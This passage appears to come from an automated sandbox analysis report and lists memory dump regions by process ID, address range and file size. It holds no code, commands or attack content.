                                                                                      • memory/3068-310-0x00000000001D0000-0x0000000000244000-memory.dmp
                                                                                        Filesize

                                                                                        464KB

                                                                                      • memory/3068-311-0x0000000000080000-0x00000000000EB000-memory.dmp
                                                                                        Filesize

                                                                                        428KB

                                                                                      • memory/3080-305-0x0000000004870000-0x0000000004871000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3080-306-0x0000000004872000-0x0000000004873000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3096-272-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                        Filesize

                                                                                        48KB

                                                                                      • memory/3096-261-0x0000000000000000-mapping.dmp
                                                                                      • memory/3132-262-0x0000000000000000-mapping.dmp
                                                                                      • memory/3164-263-0x0000000000000000-mapping.dmp
                                                                                      • memory/3184-279-0x00000000025E0000-0x00000000025E1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3184-264-0x0000000000000000-mapping.dmp
                                                                                      • memory/3184-273-0x00000000048F0000-0x00000000048F1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3184-275-0x00000000048B2000-0x00000000048B3000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3184-285-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3184-288-0x0000000006160000-0x0000000006161000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3184-291-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3184-270-0x0000000000A90000-0x0000000000A91000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3184-278-0x00000000048B0000-0x00000000048B1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3236-267-0x0000000000402F68-mapping.dmp
                                                                                      • memory/3236-266-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                        Filesize

                                                                                        48KB

                                                                                      • memory/3248-297-0x00000000048B0000-0x00000000048B1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3248-298-0x00000000048B2000-0x00000000048B3000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3300-269-0x0000000000000000-mapping.dmp
                                                                                      • memory/3300-274-0x0000000000A90000-0x0000000000A91000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3300-284-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3448-280-0x0000000000000000-mapping.dmp
                                                                                      • memory/3456-299-0x0000000004910000-0x0000000004911000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3456-300-0x0000000004912000-0x0000000004913000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3476-282-0x0000000000000000-mapping.dmp
                                                                                      • memory/3848-293-0x0000000000000000-mapping.dmp
                                                                                      • memory/3856-304-0x00000000048C2000-0x00000000048C3000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3856-303-0x00000000048C0000-0x00000000048C1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3868-294-0x0000000000000000-mapping.dmp
                                                                                      • memory/7644-315-0x0000000000060000-0x000000000006C000-memory.dmp
                                                                                        Filesize

                                                                                        48KB

                                                                                      • memory/7644-314-0x0000000000070000-0x0000000000077000-memory.dmp
                                                                                        Filesize

                                                                                        28KB

                                                                                      • memory/7812-307-0x0000000004880000-0x0000000004881000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/7952-309-0x0000000000610000-0x0000000000611000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/7992-308-0x0000000007230000-0x0000000007231000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/8148-312-0x0000000001CD0000-0x0000000001D61000-memory.dmp
                                                                                        Filesize

                                                                                        580KB

                                                                                      • memory/8148-313-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                        Filesize

                                                                                        644KB